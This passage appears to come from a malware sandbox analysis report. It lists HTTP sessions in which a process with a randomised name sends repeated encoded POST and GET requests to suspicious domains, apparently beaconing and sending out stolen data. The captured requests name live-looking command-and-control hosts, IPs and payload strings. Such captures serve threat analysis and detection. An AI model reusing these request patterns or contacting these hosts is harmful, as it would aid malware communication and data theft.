                                                                                                                                                Nov 25, 2024 09:43:55.395175934 CET | 349 | IN | Data Raw: [gzip-compressed response body, continued]


                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                20 | 192.168.2.4 | 49887 | 172.67.223.206 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                Nov 25, 2024 09:43:56.739197969 CET | 522 | OUT | GET /nja3/?ifzt=xX7QHijLKmKAWZAs9KUJ90Gt08KwtA5eAlD9v6t/QyACTljzLqSragPJ2hUI6qEgwVB84l05/Y7pq3HewBlXgm1FdHpiB2a4qq1LC2jezQbSehWYjzmvyps=&qX=qP0hoZO0bjg4 HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.ssrpidemt-soar.sbs
                                                                                                                                                Connection: close
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
Nov 25, 2024 09:43:58.057775021 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 25 Nov 2024 08:43:57 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=syP%2F37s08wI9AxVRDoekntVfX73U30%2B44oBKnIB%2BQQF0Z1t%2BvLvzERA9Nskmksgz00azIRYOjYUancTjwINhbTKHr9EP3yRXkAzQ0Nlr6ahNkDIZCJ3YY93RgnHFtmejCWhmBXOzEjhr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e805aa5aec40f45-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1665&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=522&delivery_rate=0&cwnd=155&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                Data Ascii: 583<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css"> body {font-siz
Nov 25, 2024 09:43:58.057900906 CET | 1007 | IN
                                                                                                                                                Data Ascii: e:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spacing: -1px; margin: -3


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49903 | 172.67.186.192 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:44:03.798336983 CET | 792 | OUT | POST /sba9/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.izmirescortg.xyz
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 201
                                                                                                                                                Origin: http://www.izmirescortg.xyz
                                                                                                                                                Referer: http://www.izmirescortg.xyz/sba9/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Ascii: ifzt=sui6YJ4P+Vemh5W/TA/H8/P4RunQCTjaxkIpyQ5bElV9mQPpRpelBXDyqIyZByWXNMe1a7lQu/jDBmxFcOzUxI13GU1xIq8LncrDxgQgbew8OZFueo5+TOY5U3K0TXGIG5XmlUdiBXVwOhHpv9GJCDCriKjkCkGRFRWJx2ZuCid9s+4xpV8Uk3hl0xAq/4T4yw==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49909 | 172.67.186.192 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:44:06.495822906 CET | 812 | OUT | POST /sba9/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.izmirescortg.xyz
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 221
                                                                                                                                                Origin: http://www.izmirescortg.xyz
                                                                                                                                                Referer: http://www.izmirescortg.xyz/sba9/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Ascii: ifzt=sui6YJ4P+Vemu9q/IjXH6fP/IOnQLzjexkEpyRtxFTF9lw/pD4elCXDyioycMSWYNMi9a5hQu/3DBnBFf/zV+411AU1JX68LncrDxgEGbfU8Pp1ueMt9M+Y6V3K0XXHBG5XElWlYBU9wOkjpupyGYTCt9aihCRqYBDHixH9tC2tip41r4kdD23FWp2Jey7uxp7FmhuBAXUHMjtiGXSopd+E=
Nov 25, 2024 09:44:07.719129086 CET | 1055 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 25 Nov 2024 08:44:07 GMT
                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DXZ5J92v8v4474zAStMVZH2IJAccT%2FyO1Zf05NZguCl4aoCPvv6%2Bpz2rhi3wM6pT0ldwT4TsqWYNLH097ooXBGFt6XZ0DiKzAhWRIWawfSonAhZKl3xDxPxi0d4%2F%2FpDKY1orWoVzJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e805ae21e7c4241-EWR
                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2110&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=812&delivery_rate=0&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49915 | 172.67.186.192 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:44:09.168637991 CET | 10894 | OUT | POST /sba9/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.izmirescortg.xyz
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 10301
                                                                                                                                                Origin: http://www.izmirescortg.xyz
                                                                                                                                                Referer: http://www.izmirescortg.xyz/sba9/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
Nov 25, 2024 09:44:10.340202093 CET | 1060 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 25 Nov 2024 08:44:10 GMT
                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=noHmE0Cv4jk80YcMc7uOgWc4bUwJBpwRoRMRIYOI%2BLnxemZh84X7hk3E%2BDmvX0CCPhvXnmSWcq8OEjiyJc%2FcA8rtet30ng%2Fb4qqQA9IGssozlWYDfN1IsYuffRth6eEVF%2FuZ5yGmpw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e805af30d814205-EWR
                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1588&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10894&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49923 | 172.67.186.192 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:44:11.833236933 CET | 520 | OUT | GET /sba9/?ifzt=hsKab5Z8okOTl8y9Vxbai4viX8bRHhfs9Ucn1wMjIFh0nzefPIjUKnrAgLCbEwixQNq8fslvmu/EEFVEU8GR0KRfEzdZZ5UTmPnT/iR9Rp0TOLJvLqtuatI=&qX=qP0hoZO0bjg4 HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.izmirescortg.xyz
                                                                                                                                                Connection: close
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
Nov 25, 2024 09:44:13.150933027 CET | 1102 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 25 Nov 2024 08:44:12 GMT
                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lyCgFL5MoDxFe%2F2B8Ls9%2B5Be5Xlj5hgtTh5W1L8Wzc5O4EhuipdKJe1hSMQW%2B6MFAFHWMy4HHVJ0z5PWSHyjU5XZIdSP0Iel3Z7UZ5l8UrwJWgs5PjjG2vBuK%2BUlCUl5gaFBl5CbAg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e805b03ed547c6c-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1928&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=520&delivery_rate=0&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>0


                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                25 | 192.168.2.4 | 49941 | 161.97.142.144 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                Nov 25, 2024 09:44:19.076984882 CET | 783 | OUT | POST /xd9h/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.030002613.xyz
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 201
                                                                                                                                                Origin: http://www.030002613.xyz
                                                                                                                                                Referer: http://www.030002613.xyz/xd9h/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Ascii: ifzt=aLazHbRlDZ8WVzo82eTnvZcZ06PNhiGCU4jYQTjOGwybk6qyXM/laeGR54uTFitx1487I0oCmSNT/FNIPv2uX0+50zT9gYGq+8DqWQrW7zyYSdOd8Xp+8+0veRAqcJxtj8qJ2FZz6IqvoBvnjkXUyzMGze9CF3N2pb45EKJfSuNYZkvT76PdRWVa1JsZX2jsCA==
                                                                                                                                                Nov 25, 2024 09:44:20.346652031 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:44:20 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                ETag: W/"66cce1df-b96"
                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                Nov 25, 2024 09:44:20.346684933 CET | 370 | IN


                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                26 | 192.168.2.4 | 49948 | 161.97.142.144 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                Nov 25, 2024 09:44:21.822097063 CET | 803 | OUT | POST /xd9h/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.030002613.xyz
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 221
                                                                                                                                                Origin: http://www.030002613.xyz
                                                                                                                                                Referer: http://www.030002613.xyz/xd9h/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Ascii: ifzt=aLazHbRlDZ8WVTY805Pn+pcW7aPN2yGeU4vYQSmVGmiblYiyUJfldeGRq4uWLCt+14wNI2sCmSZT/EdIMZ+xWk+3/TT7kYGq+8DqWROz73WYRted9zd5/+0gTBAqYJwkj8q32EFJ6KSvoELnj1XbpjM6tu9UUlMcmqZSMbhnUs9PVCiJqLuKDWxpoOlta1elZCX3QXSW1Bbh9cduV+U5n08=
                                                                                                                                                Nov 25, 2024 09:44:23.073374987 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:44:22 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                ETag: W/"66cce1df-b96"
                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                Nov 25, 2024 09:44:23.073443890 CET | 370 | IN


                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                27 | 192.168.2.4 | 49954 | 161.97.142.144 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                Nov 25, 2024 09:44:24.731765032 CET | 10885 | OUT | POST /xd9h/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.030002613.xyz
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 10301
                                                                                                                                                Origin: http://www.030002613.xyz
                                                                                                                                                Referer: http://www.030002613.xyz/xd9h/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Nov 25, 2024 09:44:25.813674927 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:44:25 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                ETag: W/"66cce1df-b96"
                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                Nov 25, 2024 09:44:25.813745975 CET | 370 | IN


                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                28 | 192.168.2.4 | 49961 | 161.97.142.144 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                Nov 25, 2024 09:44:27.455677986 CET | 517 | OUT | GET /xd9h/?ifzt=XJyTEs9GXoAybgJL3Lz0/JwH+eiTm1uUb57LZhSSXQP8iaO5Q6m7cM20hY6MGSJfub8ibR0rowNO83l3EomIXmC1+i3fga28+sLpZTTW/AC/fI2RjxZA+PI=&qX=qP0hoZO0bjg4 HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.030002613.xyz
                                                                                                                                                Connection: close
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Nov 25, 2024 09:44:28.762455940 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:44:28 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Content-Length: 2966
                                                                                                                                                Connection: close
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                ETag: "66cce1df-b96"
                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                                                                                                Nov 25, 2024 09:44:28.762536049 CET | 1236 | IN
                                                                                                                                                Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                                                                                                Nov 25, 2024 09:44:28.762573004 CET | 448 | IN
                                                                                                                                                Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"
Nov 25, 2024 09:44:28.762603998 CET | 250 | IN
                                                                                                                                                Data Ascii: <p>Oops! We couldn't find the page that you're looking for.</p><p>Please check the address and try again.</p><section class="footer"><strong>Error Code:</strong> 404</section></div></div></div></div></body><


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 49978 | 43.199.54.158 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:44:34.239140987 CET | 777 | OUT | POST /zoqm/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.327531.buzz
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 201
                                                                                                                                                Origin: http://www.327531.buzz
                                                                                                                                                Referer: http://www.327531.buzz/zoqm/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Ascii: ifzt=doclGt1k/wdoylOs72U8UEfMTT8oKV6tAF7B93oXTyRD87lIxsp5ViWi1sQo4XvbHVlUFxbkF+hnFLlJKAYB2/P+wC0k+tPv1cgs864HD2LrThAypra2qDdAxYNBC6U8OmdVnK8R9xstvZpyveP3t7ZXF1WiN1HjvV2b3XOTVNRAGzgm1VwnbW8jPLTwBGx3aQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 49986 | 43.199.54.158 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:44:36.903022051 CET | 797 | OUT | POST /zoqm/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.327531.buzz
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 221
                                                                                                                                                Origin: http://www.327531.buzz
                                                                                                                                                Referer: http://www.327531.buzz/zoqm/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Ascii: ifzt=doclGt1k/wdoxF+soF88SkfNWT8oB16hAF3B929KTA1D8a1Iwtp5ZCWitcQplHvQHUYpF0jkF+lnFPhJKxYC3vPw8i0iwNPv1cgs86toD2TrUV8ypKa1ijdH44NBUKU4OmdnnO839yUtvctyvPOFn7ZVaFXjHXiH3Vz7+UvyfY1MH1t8kkRwJWYQSMaEMFM+BQ6MqWT7wMN5+16KruIyBqs=
Nov 25, 2024 09:44:38.460024118 CET | 390 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:44:38 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 49993 | 43.199.54.158 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:44:39.572726965 CET | 10879 | OUT | POST /zoqm/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.327531.buzz
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 10301
                                                                                                                                                Origin: http://www.327531.buzz
                                                                                                                                                Referer: http://www.327531.buzz/zoqm/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
Data Ascii: ifzt= [TRUNCATED]
Nov 25, 2024 09:44:41.115652084 CET | 390 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:44:40 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 49999 | 43.199.54.158 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
